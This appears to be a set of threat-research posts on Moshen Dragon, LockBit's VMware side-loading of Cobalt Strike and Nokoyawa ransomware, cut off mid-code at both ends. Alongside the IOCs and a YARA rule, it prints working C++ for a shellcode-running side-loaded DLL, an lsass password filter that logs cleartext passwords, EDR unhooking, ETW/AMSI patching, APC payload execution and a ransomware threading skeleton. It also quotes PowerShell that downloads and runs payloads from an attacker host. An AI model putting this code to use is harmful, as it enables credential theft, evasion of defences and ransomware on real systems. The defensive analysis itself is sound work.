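    GetModuleHandleExW(GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS,
                       (LPCWSTR)&LoadAndRunPayload, &self);
    GetModuleFileNameW(self, path, MAX_PATH);
    wchar_t* slash = wcsrchr(path, L'\\');
    if (!slash) return;
    wcscpy_s(slash + 1, MAX_PATH - (slash + 1 - path), kPayloadName);

    // Read the encrypted payload from disk.
    HANDLE f = CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, NULL,
                           OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (f == INVALID_HANDLE_VALUE) return;
    DWORD size = GetFileSize(f, NULL), read = 0;
    std::vector<unsigned char> buf(size);
    ReadFile(f, buf.data(), size, &read, NULL);
    CloseHandle(f);

    // "Decrypt", copy into executable memory, and run it as shellcode.
    for (DWORD i = 0; i < read; i++) buf[i] ^= kXorKey;
    void* exec = VirtualAlloc(NULL, read, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec) return;
    memcpy(exec, buf.data(), read);
    ((void(*)())exec)();
}

// In a real triad, this DLL would also export whatever names the hijacked host
// EXE imports, so the loader resolves it in place of the legitimate library.
BOOL APIENTRY DllMain(HMODULE, DWORD reason, LPVOID) {
    if (reason == DLL_PROCESS_ATTACH) LoadAndRunPayload();
    return TRUE;
}

The signed host executable, the look-alike DLL, and the encrypted payload file are the three pieces that make up the triad.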

The way the payloads were deployed, as well as other actions within target networks, suggest the threat actor uses IMPACKET for lateral movement. Upon execution, some of the payloads will achieve persistence by either creating a scheduled task or a service.

Execution flow of hijacked software as carried out by Moshen Dragon

As major portions of the Moshen Dragon activity were identified and blocked, the threat actor consistently deployed new malware, using five different security products to sideload PlugX and ShadowPad variants.

A summary of the hijacked software is presented in the table below:

Product Path
Symantec SNAC C:\Windows\AppPatch, C:\ProgramData\SymantecSNAC, C:\ProgramData\Symantec\SNAC, C:\Windows\Temp
TrendMicro Platinum Watch Dog C:\Windows\AppPatch
BitDefender SSL Proxy Tool C:\ProgramData\Microsoft\Windows, C:\ProgramData\Microsoft\Windows\LfSvc, C:\ProgramData\Microsoft\Windows\WinMSIPC, C:\ProgramData\Microsoft\Windows\ClipSVC, C:\ProgramData\Microsoft\Wlansvc, C:\ProgramData\Microsoft\Windows\Ringtones
McAfee Agent C:\ProgramData\McAfee, C:\ProgramData\Microsoft\WwanSvc, C:\ProgramData\Microsoft\WinMSIPC
Kaspersky Anti-Virus Launcher C:\ProgramData\Microsoft\XboxLive, C:\programdata\GoogleUpdate

Lateral Movement Using Impacket

Impacket is a collection of Python classes for working with network protocols, commonly utilized by threat actors for lateral movement. One of the favorite tools in the Impacket arsenal is wmiexec, which enables remote code execution via WMI. An effective way to identify wmiexec execution is searching for the unique command line pattern it creates. Moshen Dragon activities are rife with this pattern.

Lateral Movement utilizing Impacket as identified by the SentinelOne Agent

LSA Notification Package – SecureFilter

When on domain controllers, Moshen Dragon dropped a password filter and loaded it into the lsass process via LSA Notification packages. Impacket is used in the following manner:

cmd.exe /Q /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Notification Packages" /t REG_MULTI_SZ /d "rassfm\0scecli\0SecureFilter" /f 1> \\127.0.0.1\ADMIN$\__[REDACTED] 2>&1

The DLL deployed is dropped in the path C:\Windows\System32\SecureFilter.dll in order to enable loading using the Notification Package feature. The DLL seems to rely on an open source project named DLLPasswordFilterImplant, effectively writing changed user passwords to the file C:\Windows\Temp\Filter.log.

Snippet from SecureFilter.dll
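
For context, a password filter is simply a DLL exporting three well-known routines that lsass calls around password changes. The sketch below shows how PasswordChangeNotify can be abused to write cleartext credentials to a log file; it is modeled on how open-source implants such as DLLPasswordFilterImplant generally work, not on the recovered SecureFilter.dll itself, and only the log path mirrors what was observed in this case.

#include <windows.h>
#include <ntsecapi.h>
#include <cstdio>

// Called by lsass when the notification package is loaded.
extern "C" __declspec(dllexport) BOOLEAN WINAPI InitializeChangeNotify(void) {
    return TRUE;
}

// Password complexity callback; returning TRUE accepts every password.
extern "C" __declspec(dllexport) BOOLEAN WINAPI PasswordFilter(
    PUNICODE_STRING AccountName, PUNICODE_STRING FullName,
    PUNICODE_STRING Password, BOOLEAN SetOperation) {
    return TRUE;
}

// Called after a password change succeeds; this is where the harvesting happens.
extern "C" __declspec(dllexport) NTSTATUS WINAPI PasswordChangeNotify(
    PUNICODE_STRING UserName, ULONG RelativeId, PUNICODE_STRING NewPassword) {
    FILE* log = NULL;
    if (_wfopen_s(&log, L"C:\\Windows\\Temp\\Filter.log", L"a") == 0 && log) {
        fwprintf(log, L"%.*s:%.*s\n",
                 (int)(UserName->Length / sizeof(WCHAR)), UserName->Buffer,
                 (int)(NewPassword->Length / sizeof(WCHAR)), NewPassword->Buffer);
        fclose(log);
    }
    return 0;   // STATUS_SUCCESS
}

BOOL APIENTRY DllMain(HMODULE, DWORD, LPVOID) {
    return TRUE;
}

Registering such a DLL is then just a matter of appending its name to the "Notification Packages" registry value, as the Impacket-driven command above does, so that lsass loads it on the next boot.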

GUNTERS – A Passive Loader

During our analysis of Moshen Dragon’s activities, we came across a passive loader previously discussed by Avast as ‘GUNTERS’. This backdoor appears to be highly targeted as it performs checks to verify that it is executed on the right machine.

Before execution, the malware calculates the hash of the machine hostname and compares it to a hardcoded value, suggesting that the threat actor generates a different DLL for each target machine.

The loader utilizes WinDivert to intercept incoming traffic, searching for a magic string that initiates a decryption process based on a custom protocol. Following decryption, the malware attempts to load a PE file with an exported function named SetNtApiFunctions, which it calls to launch the payload.

Exported functions of an internal GUNTERS resource utilized in the loading process

A thorough analysis of the custom protocol and loading mechanism is available here.

Additional Payloads

SentinelLabs came across additional related artifacts overlapping with this threat cluster. It’s possible that some of those were utilized by Moshen Dragon or a related actor.

File name SHA1 C&C
SNAC.log e9e8c2e720f5179ff1c0ac30ce017224ac0b2f1b freewula.strangled.net szuunet.strangled.net
SNAC.log b6c6c292cbd35298a5f055448177bcfd5d0b23bf final.staticd.dynamic-dns.net
SNAC.log 2294ecbbb065c517bd0e01f3f01aabd0a0402f5a dhsg123.jkub.com
bdch.tmp 7021a62b68751b7a3a2984b2996139aca8d19fec greenhugeman.dns04.com

After analyzing these payloads, we found them to be additional PlugX and ShadowPad variants. SNAC.log payloads have been identified by other researchers as Talisman, which is known to be another variant of PlugX. In addition, the bdch.tmp payload was produced by shellcode with a structure similar to ShadowPad malware but without the initial code obfuscation and decryption logic typically seen in ShadowPad.

Conclusion

PlugX and ShadowPad have a well-established history of use among Chinese-speaking threat actors, primarily for espionage activity. Those tools have flexible, modular functionality and are delivered via shellcode to more easily bypass traditional endpoint protection products.

Here we focused on Moshen Dragon TTPs observed during an unusual engagement that forced the threat actor to conduct multiple phases of trial-and-error to attempt to deploy their malware. Once the attackers have established a foothold in an organization, they proceed with lateral movement by leveraging Impacket within the network, placing a passive backdoor into the victim environment, harvesting as many credentials as possible to ensure unlimited access, and focusing on data exfiltration.

SentinelLabs continues to monitor Moshen Dragon activity as it unfolds.

Indicators of Compromise

Hijacked DLLs

  • ef3e558ecb313a74eeafca3f99b7d4e038e11516
  • 3c6a51961aa328ba507796153234309a5e83bee3
  • fae572ad1beab78e293f756fd53cf71963fdb1bd
  • 308ed56dc1fbc98b574f937d4b005190c878416f
  • 55e89f458b5f5642300dd7c50b444232e37c3fa7

Payloads

  • e9e8c2e720f5179ff1c0ac30ce017224ac0b2f1b
  • b6c6c292cbd35298a5f055448177bcfd5d0b23bf
  • 2294ecbbb065c517bd0e01f3f01aabd0a0402f5a
  • 7021a62b68751b7a3a2984b2996139aca8d19fec

Password Filter

  • c4f1177f68676b770934b142f9c3e2c4eff7f164

GUNTERS

  • bb68816f324f2ac4f0d4756b66af67d01c8b6e4e
  • 4025e14a7f8928753ba06ad155944624069497dc
  • f5b8ab4a7d9c723c2b3b842b49f66da2e1697ce0

Infrastructure

  • freewula.strangled[.]net
  • szuunet.strangled[.]net
  • final.staticd.dynamic-dns[.]net
  • dhsg123.jkub[.]com
  • greenhugeman.dns04[.]com
  • gfsg.chickenkiller[.]com
  • pic.farisrezky[.]com

✇SentinelLabs

LockBit Ransomware Side-loads Cobalt Strike Beacon with Legitimate VMware Utility

By: James Haughom

By James Haughom, Júlio Dantas, and Jim Walter

Executive Summary

  • The VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs is susceptible to DLL side-loading.
  • During a recent investigation, our DFIR team discovered that LockBit Ransomware-as-a-Service (RaaS) side-loads Cobalt Strike Beacon through a signed VMware xfer logs command line utility.
  • The threat actor uses PowerShell to download the VMware xfer logs utility along with a malicious DLL, and a .log file containing an encrypted Cobalt Strike Reflective Loader.
  • The malicious DLL evades defenses by removing EDR/EPP’s userland hooks, and bypasses both Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI).
  • There are suggestions (via vx-underground) that the side-loading functionality was implemented by an affiliate, likely DEV-0401, rather than the LockBit developers themselves.

Overview

LockBit is a Ransomware as a Service (RaaS) operation that has been active since 2019 (previously known as “ABCD”). It commonly leverages the double extortion technique, employing tools such as StealBit, WinSCP, and cloud-based backup solutions for data exfiltration prior to deploying the ransomware. Like most ransomware groups, LockBit’s post-exploitation tool of choice is Cobalt Strike.

During a recent investigation, our DFIR team discovered an interesting technique used by LockBit Ransomware Group, or perhaps an affiliate, to load a Cobalt Strike Beacon Reflective Loader. In this particular case, LockBit managed to side-load Cobalt Strike Beacon through a signed VMware xfer logs command line utility.

Since our initial publication of this report, we have identified a connection with an affiliate Microsoft tracks as DEV-0401. A switch to LockBit represents a notable departure in DEV-0401’s previously observed TTPs.

Side-loading is a DLL-hijacking technique used to trick a benign process into loading and executing a malicious DLL by placing the DLL alongside the process’ corresponding EXE, taking advantage of the DLL search order. In this instance, the threat actor used PowerShell to download the VMware xfer logs utility along with a malicious DLL, and a .log file containing an encrypted Cobalt Strike Reflective Loader. The VMware utility was then executed via cmd.exe, passing control flow to the malicious DLL.

The DLL then proceeded to evade defenses by removing EDR/EPP’s userland hooks, as well as bypassing both Event Tracing for Windows (ETW) and Antimalware Scan Interface (AMSI). The .log file was then loaded in memory and decrypted via RC4, revealing a Cobalt Strike Beacon Reflective Loader. Lastly, a user-mode Asynchronous Procedure Call (APC) is queued, which is used to pass control flow to the decrypted Beacon.

Attack Chain

The attack chain began with several PowerShell commands executed by the threat actor to download three components: a malicious DLL, a signed VMwareXferlogs executable, and an encrypted Cobalt Strike payload in the form of a .log file.

Filename Description
glib-2.0.dll Weaponized DLL loaded by VMwareXferlogs.exe
VMwareXferlogs.exe Legitimate/signed VMware command line utility
c0000015.log Encrypted Cobalt Strike payload

Our DFIR team recovered the complete PowerShell cmdlets used to download the components from forensic artifacts.

Invoke-WebRequest -uri hxxp://45.32.108[.]54:443/glib-2.0.dll -OutFile c:\windows\debug\glib-2.0.dll;

Invoke-WebRequest -uri hxxp://45.32.108[.]54:443/c0000015.log -OutFile c:\windows\debug\c0000015.log;

Invoke-WebRequest -uri hxxp://45.32.108[.]54:443/VMwareXferlogs.exe -OutFile c:\windows\debug\VMwareXferlogs.exe;c:\windows\debug\VMwareXferlogs.exe

The downloaded binary (VMwareXferlogs.exe) was then executed via the command prompt, with the STDOUT being redirected to a file.

c:\windows\debug\VMwareXferlogs.exe 1> 
\\127.0.0.1\ADMIN$\__1649832485.0836577 2>&1

The VMwareXferlogs.exe is a legitimate, signed executable belonging to VMware.

VirusTotal Signature Summary

This utility is used to transfer data to and from VMX logs.

VMware xfer utility command line usage

This command line utility makes several calls to a third party library called glib-2.0.dll. Both the utility and a legitimate version of glib-2.0.dll are shipped with VMware installations.

glib-2.0.dll functions being called by VMwareXferlog.exe

The weaponized glib-2.0.dll downloaded by the threat actor exports all the necessary functions imported by VMwareXferlogs.exe.

Exported functions of malicious glib-2.0.dll
glib-2.0.dll-related functions imported by VMwareXferlog.exe

Calls to exported functions from glib-2.0.dll are made within the main function of the VMware utility, the first being g_path_get_basename().

glib-2.0.dll functions being called by VMwareXferlog.exe

Note that the virtual addresses for the exported functions are all the same for the weaponized glib-2.0.dll (0x1800020d0), except for g_path_get_basename, which has a virtual address of 0x180002420. This is because all exports except g_path_get_basename do nothing other than call ExitProcess().

g_error_free() function’s logic

On the other hand, g_path_get_basename() invokes the malicious payload prior to exiting.

When VMwareXferlogs.exe calls this function, control flow is transferred to the malicious glib-2.0.dll, rather than the legitimate one, completing the side-loading attack.

g_path_get_basename() being called in the main() function

Once control flow is passed to the weaponized DLL, the presence of a debugger is checked by querying the BeingDebugged flag and NtGlobalFlag in the Process Environment Block (PEB). If a debugger is detected, the malware enters an endless loop.

Anti-debug mechanisms
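
A common implementation of these two checks looks like the sketch below. This is a generic illustration of the technique described, not the sample's exact code: it reads the PEB pointer off the GS segment on x64 and tests the BeingDebugged byte and the NtGlobalFlag heap flags at their commonly documented offsets.

#include <windows.h>
#include <intrin.h>
#include <cstdio>

// Heap flags set in NtGlobalFlag when a process is created under a debugger:
// FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS
#define DBG_HEAP_FLAGS 0x70

static bool DebuggerPresent() {
    // gs:[0x60] holds the PEB pointer on x64 Windows.
    unsigned char* peb = (unsigned char*)__readgsqword(0x60);
    unsigned char beingDebugged = *(peb + 0x02);                  // PEB->BeingDebugged
    unsigned long ntGlobalFlag  = *(unsigned long*)(peb + 0xBC);  // PEB->NtGlobalFlag (x64 offset)
    return beingDebugged != 0 || (ntGlobalFlag & DBG_HEAP_FLAGS) != 0;
}

int main() {
    if (DebuggerPresent()) {
        // The LockBit loader spins forever here instead of continuing.
        for (;;) Sleep(1000);
    }
    printf("no debugger detected, continuing\n");
    return 0;
}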

Bypassing EDR/EPP Userland Hooks

At this juncture, the malware enters a routine to bypass any userland hooks by manually mapping itself into memory, performing a byte-by-byte inspection for discrepancies between the fresh copy and its loaded self, and then overwriting any sections that differ.

This routine is repeated for all loaded modules, thus allowing the malware to identify any potential userland hooks installed by EDR/EPP, and overwrite them with the unpatched/unhooked code directly from the modules’ images on disk.

Checking for discrepancies between on-disk and in-memory for each loaded module

For example, EDR’s userland NT layer hooks may be removed with this technique. The below subroutine shows a trampoline where a SYSCALL stub would typically reside, but instead jumps to a DLL injected by EDR. This subroutine will be overwritten/restored to remove the hook.

EDR-hooked SYSCALL stub that will be patched

Here is a look at the patched code to restore the original SYSCALL stub and remove the EDR hook.

NT layer hook removed and original code restored
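
A typical way to implement this kind of unhooking, sketched below under our own assumptions rather than taken from the sample, is to map a fresh copy of the module from disk with SEC_IMAGE, so its section layout matches the loaded copy, and then restore any executable bytes that differ.

#include <windows.h>
#include <cstring>

// Restore the .text section of a loaded module from its on-disk image,
// wiping any inline hooks an EDR/EPP may have written into it.
static void UnhookModule(const wchar_t* path, HMODULE loaded) {
    HANDLE file = CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, NULL,
                              OPEN_EXISTING, 0, NULL);
    if (file == INVALID_HANDLE_VALUE) return;
    // SEC_IMAGE maps the file with the same section layout the loader uses,
    // so RVAs in the fresh copy line up with RVAs in the hooked, loaded copy.
    HANDLE mapping = CreateFileMappingW(file, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
    void* fresh = mapping ? MapViewOfFile(mapping, FILE_MAP_READ, 0, 0, 0) : NULL;
    if (fresh) {
        BYTE* base = (BYTE*)loaded;
        IMAGE_DOS_HEADER* dos = (IMAGE_DOS_HEADER*)base;
        IMAGE_NT_HEADERS* nt = (IMAGE_NT_HEADERS*)(base + dos->e_lfanew);
        IMAGE_SECTION_HEADER* sec = IMAGE_FIRST_SECTION(nt);
        for (WORD i = 0; i < nt->FileHeader.NumberOfSections; i++, sec++) {
            if (memcmp(sec->Name, ".text", 5) != 0) continue;
            BYTE* hooked = base + sec->VirtualAddress;
            BYTE* clean  = (BYTE*)fresh + sec->VirtualAddress;
            SIZE_T size  = sec->Misc.VirtualSize;
            if (memcmp(hooked, clean, size) != 0) {
                DWORD old;
                // Overwrite the live code with the pristine bytes from disk.
                VirtualProtect(hooked, size, PAGE_EXECUTE_READWRITE, &old);
                memcpy(hooked, clean, size);
                VirtualProtect(hooked, size, old, &old);
            }
        }
        UnmapViewOfFile(fresh);
    }
    if (mapping) CloseHandle(mapping);
    CloseHandle(file);
}

int main() {
    // The malware repeats this for every loaded module; ntdll is the usual first target.
    UnhookModule(L"C:\\Windows\\System32\\ntdll.dll", GetModuleHandleW(L"ntdll.dll"));
    return 0;
}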

Once these hooks are removed, the malware continues to evade defenses. Next, it attempts to bypass Event Tracing for Windows (ETW) by patching the EtwEventWrite WinAPI with a RET instruction (0xC3), preventing any useful ETW telemetry related to this process from being generated.

Event Tracing for Windows bypass

AMSI is bypassed in the same way as ETW, by patching AmsiScanBuffer. This prevents AMSI from inspecting potentially suspicious buffers within this process.

AMSI bypass
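
Both patches amount to the same few lines. The following is a generic sketch of the described technique rather than the sample's code: resolve the target export, make it writable, and write a single 0xC3 so the function returns immediately.

#include <windows.h>

// Overwrite the first byte of an exported function with RET (0xC3).
static void PatchWithRet(const char* moduleName, const char* funcName) {
    HMODULE mod = LoadLibraryA(moduleName);
    if (!mod) return;
    void* target = (void*)GetProcAddress(mod, funcName);
    if (!target) return;
    DWORD old;
    VirtualProtect(target, 1, PAGE_EXECUTE_READWRITE, &old);
    *(unsigned char*)target = 0xC3;                 // ret
    VirtualProtect(target, 1, old, &old);
    FlushInstructionCache(GetCurrentProcess(), target, 1);
}

int main() {
    PatchWithRet("ntdll.dll", "EtwEventWrite");     // silences ETW telemetry from this process
    PatchWithRet("amsi.dll",  "AmsiScanBuffer");    // stops AMSI buffer scans in this process
    return 0;
}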

Once these defenses have been bypassed, the malware proceeds to execute the final payload. The final payload is a Cobalt Strike Beacon Reflective Loader that is stored RC4-encrypted in the previously mentioned c0000015.log file. The RC4 Key Scheduling Algorithm can be seen below with the hardcoded 136-byte key.

&.5 \C3%YHO2SM-&B3!XSY6SV)6(&7;(3.'
$F2WAED>>;K]8\*D#[email protected](R,+]A-G\D
HERIP:45:X(WN8[?3Y>XCWNPOL89>[.# Q'
4CP8M-%4N[7.$R->-1)$!NU"W$!YT<J$V[
RC4 Key Scheduling Algorithm

The RC4 decryption of the payload then commences.

RC4 decryption routine

The final result is Beacon’s Reflective Loader, seen below with the familiar magic bytes and hardcoded strings.

Decrypted Cobalt Strike Beacon Reflective Loader

Once decrypted, the region of memory that the payload resides in is made executable (PAGE_EXECUTE_READWRITE), and a new thread is created for this payload to run within.

This thread is created in a suspended state, allowing the malware to add a user-mode APC, pointing to the payload, to the newly created thread’s APC queue. Finally, the thread is resumed, allowing the thread to run and execute the Cobalt Strike payload via the APC.

Logic to queue and execute user-mode APC
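
The final hand-off described above can be reproduced with a handful of API calls. The sketch below is illustrative only, with a placeholder print routine standing in for the decrypted Beacon loader; the thread entry deliberately enters an alertable wait so the queued APC is guaranteed to be delivered once the thread resumes.

#include <windows.h>
#include <cstdio>

// Placeholder standing in for the decrypted reflective loader.
static void CALLBACK FakePayload(ULONG_PTR) {
    printf("payload running via queued APC\n");
}

// Worker the suspended thread will run; SleepEx(..., TRUE) makes it alertable.
static DWORD WINAPI AlertableWait(LPVOID) {
    SleepEx(INFINITE, TRUE);
    return 0;
}

int main() {
    // In the real chain, the decrypted Beacon buffer is first made executable, e.g.:
    // VirtualProtect(beacon, beaconSize, PAGE_EXECUTE_READWRITE, &old);

    HANDLE thread = CreateThread(NULL, 0, AlertableWait, NULL, CREATE_SUSPENDED, NULL);
    if (!thread) return 1;
    QueueUserAPC(FakePayload, thread, 0);   // point the APC at the payload
    ResumeThread(thread);                   // thread resumes, APC fires, payload runs
    WaitForSingleObject(thread, 5000);
    CloseHandle(thread);
    return 0;
}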

The DLL is detected by the SentinelOne agent prior to being loaded and executed.

Detection for LockBit DLL

VMware Side-loading Variants

A handful of samples related to the malicious DLL were discovered during our investigation, the only notable differences being the RC4 key and the name of the file containing the RC4-encrypted payload.

For example, several of the samples attempt to load the file vmtools.ini rather than c0000015.log.

The vmtools.ini file being accessed by a variant

Another variant loads the same file name, vmtools.ini, yet is packed with a custom version of UPX.

Tail jump at the end of the UPX unpacking stub

Conclusion

The VMware command line utility VMwareXferlogs.exe used for data transfer to and from VMX logs is susceptible to DLL side-loading. In our engagement, we saw that the threat actor had created a malicious version of the legitimate glib-2.0.dll to only have code within the g_path_get_basename() function, while all other exports simply called ExitProcess(). This function invokes a malicious payload which, among other things, attempts to bypass EDR/EPP userland hooks and engages in anti-debugging logic.

LockBit continues to be a successful RaaS and the developers are clearly innovating in response to EDR/EPP solutions. We hope that by describing this latest technique, defenders and security teams will be able to improve their ability to protect their organizations.

Indicators of Compromise

SHA1 Description
729eb505c36c08860c4408db7be85d707bdcbf1b Malicious glib-2.0.dll from investigation
091b490500b5f827cc8cde41c9a7f68174d11302 Decrypted Cobalt Strike payload
e35a702db47cb11337f523933acd3bce2f60346d Encrypted Cobalt Strike payload – c0000015.log
25fbfa37d5a01a97c4ad3f0ee0396f953ca51223 glib-2.0.dll vmtools.ini variant
0c842d6e627152637f33ba86861d74f358a85e1f glib-2.0.dll vmtools.ini variant
1458421f0a4fe3acc72a1246b80336dc4138dd4b glib-2.0.dll UPX-packed vmtools.ini variant
File Path Description
c:\windows\debug\VMwareXferlogs.exe Full path to legitimate VMware command line utility
c:\windows\debug\glib-2.0.dll Malicious DLL used for hijack
c:\windows\debug\c0000015.log Encrypted Cobalt Strike reflective loader
C2 Description
149.28.137[.]7 Cobalt Strike C2
45.32.108[.]54 Attacker C2

YARA Hunting Rules

import "pe"

rule Weaponized_glib2_0_dll
{
	meta:
		description = "Identify potentially malicious versions of glib-2.0.dll"
		author = "James Haughom @ SentinelOne"
		date = "2022-04-22"
		reference = "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/"

	/*
		The VMware command line utility 'VMwareXferlogs.exe' used for data
		transfer to/from VMX logs is susceptible to DLL sideloading. The
		malicious versions of this DLL typically only have code within 
		the function 'g_path_get_basename()' properly defined, while the
		rest of the exports will simply call 'ExitProcess()'. Notice how
		in the exports below, the virtual address for all exported functions
		are the same except for 'g_path_get_basename()'. We can combine this
		along with an anomalously low number of exports for this DLL, as
		legit instances of this DLL tend to have over 1k exports.

		[Exports]

		nth paddr      vaddr       bind   type size lib          name
		―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――
		1   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_error_free
		2   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_free
		3   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_add_main_entries
		4   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_free
		5   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_get_help
		6   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_new
		7   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_option_context_parse
		8   0x00001820 0x180002420 GLOBAL FUNC 0    glib-2.0.dll g_path_get_basename
		9   0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_print
		10  0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_printerr
		11  0x000014d0 0x1800020d0 GLOBAL FUNC 0    glib-2.0.dll g_set_prgname


		This rule will detect malicious versions of this DLL by identifying
		if the virtual address is the same for all of the exported functions
		used by 'VMwareXferlogs.exe' except for 'g_path_get_basename()'.
	*/

	condition:
		/* sample is an unsigned DLL */
		pe.characteristics & pe.DLL and pe.number_of_signatures == 0 and

		/* ensure that we have all of the exported functions of glib-2.0.dll imported by VMwareXferlogs.exe */
		pe.exports("g_path_get_basename") and
		pe.exports("g_error_free") and
		pe.exports("g_free") and
		pe.exports("g_option_context_add_main_entries") and
		pe.exports("g_option_context_get_help") and
		pe.exports("g_option_context_new") and
		pe.exports("g_print") and
		pe.exports("g_printerr") and
		pe.exports("g_set_prgname") and
		pe.exports("g_option_context_free") and
		pe.exports("g_option_context_parse") and

		/* all exported functions have the same offset besides g_path_get_basename */
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_error_free")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_get_help")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_new")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_add_main_entries")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_print")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_printerr")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_set_prgname")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_free")].offset and
		pe.export_details[pe.exports_index("g_free")].offset == pe.export_details[pe.exports_index("g_option_context_parse")].offset and
		pe.export_details[pe.exports_index("g_free")].offset != pe.export_details[pe.exports_index("g_path_get_basename")].offset and

		/* benign glib-2.0.dll instances tend to have ~1k exports while malicious ones have the bare minimum */
		pe.number_of_exports < 20 /* threshold assumed; the exact value was truncated in this copy of the rule */
}

MITRE ATT&CK TTPs

TTP MITRE ID
Encrypted Cobalt Strike payload T1027
DLL Hijacking T1574
ETW Bypass T1562.002
AMSI Bypass T1562.002
Unhooking EDR T1562.001
Encrypted payload T1027.002
Powershell usage T1059.001
Cobalt Strike S0154

✇SentinelLabs

Nokoyawa Ransomware | New Karma/Nemty Variant Wears Thin Disguise

By: Antonis Terefos

Executive Summary

  • At the beginning of February 2022, SentinelLabs observed two samples of a new Nemty variant dubbed “Nokoyawa” (sample 1, 2).
  • SentinelLabs consider Nokoyawa to be an evolution of the previous Nemty strain, Karma.
  • The developers have attempted to enhance code responsible for excluding folders from encryption, but SentinelLabs analysis finds that the algorithm contains logical flaws.
  • In March, TrendMicro suggested this ransomware bore some relation to Hive. We assess that Hive and Nokoyawa are different and that the latter is not a rebrand of Hive RaaS.

Overview

In this post, we take a broader look at the similarities between Nokoyawa and Karma ransomware. Previous researchers have highlighted similarities in the attack chain between Nokoyawa and Hive ransomware, concluding that “Nokoyawa is likely connected with Hive, as the two families share some striking similarities in their attack chain, from the tools used to the order in which they execute various steps.” Our analysis contradicts that finding, and we assess Nokoyawa is clearly an evolution of Karma (Nemty), bearing no major code similarities to Hive.

Nokoyawa and Karma Variant Similarities

Both Nokoyawa and Karma variants manage multi-threaded encryption by creating an input/output (I/O) completion port (CreateIoCompletionPort), which allows communication between the thread responsible for the enumeration of files and the sub-threads (“2 * NumberOfProcessors”) responsible for the file encryption.

Nokoyawa (left) vs Karma, initialization of encryption threads
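
The shared pattern looks roughly like the sketch below. This is an illustration of the I/O completion port model only, with the encryption reduced to a stub and all names hypothetical: the enumeration thread posts one completion packet per file, and 2 * NumberOfProcessors workers pull packets off the port.

#include <windows.h>
#include <cstdio>

// Packet handed from the enumeration thread to the encryption workers.
struct FileWorkItem {
    wchar_t path[MAX_PATH];
};

static DWORD WINAPI EncryptionWorker(LPVOID param) {
    HANDLE port = (HANDLE)param;
    DWORD bytes; ULONG_PTR key; LPOVERLAPPED ov;
    while (GetQueuedCompletionStatus(port, &bytes, &key, &ov, INFINITE)) {
        FileWorkItem* item = (FileWorkItem*)ov;
        if (!item) break;                                        // NULL packet = shutdown signal
        wprintf(L"[worker] would encrypt %s\n", item->path);     // encryption stub
        delete item;
    }
    return 0;
}

int main() {
    SYSTEM_INFO si;
    GetSystemInfo(&si);
    DWORD workers = si.dwNumberOfProcessors * 2;    // matches the "2 * NumberOfProcessors" sub-threads

    HANDLE port = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
    for (DWORD i = 0; i < workers; i++)
        CreateThread(NULL, 0, EncryptionWorker, port, 0, NULL);

    // Enumeration thread side: post one packet per discovered file.
    const wchar_t* files[] = { L"C:\\demo\\a.doc", L"C:\\demo\\b.xlsx" };
    for (const wchar_t* f : files) {
        FileWorkItem* item = new FileWorkItem();
        wcscpy_s(item->path, f);
        PostQueuedCompletionStatus(port, 0, 0, (LPOVERLAPPED)item);
    }
    // Tell each worker to exit, then give them a moment to drain the queue.
    for (DWORD i = 0; i < workers; i++)
        PostQueuedCompletionStatus(port, 0, 0, NULL);
    Sleep(1000);
    CloseHandle(port);
    return 0;
}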

In both cases, public keys for the encryption and ransom note are encoded with Base64.

Like Karma, Nokoyawa accepts different command line parameters, although in the latter they are documented by the developer via a -help command.

Nokoyawa command line support

Aside from the -help command, three other commands (-network, -file, and -dir) are also provided.

Parameter Functionality
-help Prints command line options for execution of ransomware.
-network Encrypts local and network shares.
-file Encrypts specified file.
-dir Encrypts specified directory.

If the ransomware is executed without any parameter, it then encrypts the machine without enumerating and encrypting network resources.

One new parameter not observed in the Karma version is -network, which is responsible for encrypting network shares. Network enumeration is achieved by calling WNetOpenEnumW, WNetEnumResourceW, and WNetCloseEnum.
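
For reference, the enumeration performed by the -network switch maps to a fairly standard WNet walk, sketched below. This is illustrative only (link against mpr.lib); the ransomware would feed each discovered share into its encryption threads rather than print it.

#include <windows.h>
#include <winnetwk.h>
#include <cstdio>
#pragma comment(lib, "mpr.lib")

// Recursively walk network resources via WNetOpenEnumW/WNetEnumResourceW,
// printing every remotely accessible disk resource that was found.
static void EnumShares(NETRESOURCEW* root) {
    HANDLE hEnum;
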